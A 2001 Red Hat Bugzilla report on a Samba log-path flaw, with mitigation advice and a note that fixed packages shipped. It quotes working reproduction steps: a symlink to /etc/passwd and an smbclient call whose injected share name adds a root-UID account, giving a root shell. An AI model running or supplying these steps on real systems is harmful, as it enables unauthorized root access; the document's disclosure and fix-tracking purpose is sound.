Bug 45645 - Log settings in configuration file allow system compromise
Summary: Log settings in configuration file allow system compromise
Keywords:
Status: CLOSED ERRATA
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: samba
Version: 6.2
Hardware: All
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Trond Eivind Glomsrxd
QA Contact: David Lawrence
URL: http://us1.samba.org/samba/whatsnew/m...
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2001-06-24 15:00 UTC by peterw
Modified: 2007-04-18 16:33 UTC (History)
0 users

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2001-06-24 17:58:52 UTC
Embargoed:


Attachments (Terms of Use)


Links
System ID Private Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2001:086 0 high SHIPPED_LIVE : New Samba packages available for Red Hat Linux 5.2, 6.2, 7 and 7.1 2001-06-23 04:00:00 UTC

Description peterw 2001-06-24 15:00:26 UTC
From Bugzilla Helper:
User-Agent: Mozilla/4.77 [en] (X11; U; Linux 2.2.19-6.2.1 i686)

Description of problem:
RHAT Samba config contains
log file = /var/log/samba/%m.log

By using unexpected values for netbios names, attackers can create new .log
files, or, using 
sym links, can append to existing files (/etc/passwd?). Michal Zalewski,
who reported the bug
on Bugtraq (and, apparently, to the Samba team), also reports that the
default Samba line of
log file = /var/log/samba/log.%m
may allow attackers to connect with invlid names containing "/" characters,
and evade logging.

How reproducible:
Always

Steps to Reproduce:
(from Michal's report)
1. ln -s /etc/passwd /tmp/x.log
2. smbclient //NIMUE/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" -n
../../../tmp/x -N
...where 'NIMUE' stands for local host name (few error messages
   should be returned).
3. su toor

Actual Results:  root shell

Expected Results:  user "toor" should not exist

Additional info:

Preferred configuration, until Samba releases a patch, is
log file = /var/log/samba/%I.log
or
log file = /var/log/samba/log.%I
which will make Smaba log by IP address, avoiding the "../" netbios name
attacks.

Comment 1 Trond Eivind Glomsrxd 2001-06-24 17:58:22 UTC
Updated (2.0.10) rpms for all releases, all architectures are currently in testing.

Comment 2 Trond Eivind Glomsrxd 2001-06-26 21:59:59 UTC
2.2.10 was released yesterday as a security errata for RHL 5.2, 6.2, 7 and 7.1.


Note You need to log in before you can comment on or make changes to this bug.